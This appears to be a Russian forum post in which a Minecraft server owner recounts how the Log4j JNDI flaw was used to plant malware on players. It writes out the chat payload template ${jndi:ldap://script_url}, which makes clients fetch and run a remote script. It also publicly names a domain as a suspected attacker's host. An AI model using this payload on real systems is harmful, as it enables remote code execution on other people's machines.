Удивительно, что у нас (на Античате) этим никто не занялся глубже. Уязвимость действительно серьезная, масштабная и полезная. Самый простой пример применения, не гипотетически, а реально затронувший немалую аудиторию - эксплуатация в игре Minecraft.
Я несколько лет содержу один сервер, сейчас малопопулярный. Но в день распространения информации об уязвимости (еще до выхода патча) по серверам уже прошлись шалуны, тестеры и разного рода хэккеры. В том числе и ко мне заглядывали, подсадив некоторым игрокам зловредов (признавайтесь, чей хост michael.klimenko.spb.ru? ).
Под Minecraftуязвимость сквозная, произвольный код легче запустить у клиента, чем на сервере (в моем случае сервер слишком специфичен и его не затронули). Сама эксплуатация наипростейшая: заход в игру и ввод в чат текстового сообщения вида ${jndi:ldap://script_url}, где script_url - это веб-адрес расположения вредоносного скрипта. У игроков, которые увидели сообщение игровой клиент сам загрузит и выполнит код.
На данный момент >95% серверов и игровых клиентов пропатчены, а в первые дни десятки тысяч игроков в одном только RU-Minecraft подверглись успешным атакам.